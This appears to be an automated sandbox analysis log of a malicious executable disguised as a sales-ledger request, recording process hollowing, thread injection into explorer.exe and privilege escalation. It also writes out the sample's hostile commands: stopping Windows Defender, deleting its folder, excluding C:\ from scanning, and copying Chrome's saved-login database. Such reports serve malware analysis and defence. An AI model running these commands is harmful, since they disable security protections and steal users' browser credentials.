Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 960000
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 9_2_00401C26
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\ Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: explorer.exe, 00000019.00000000.318115996.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
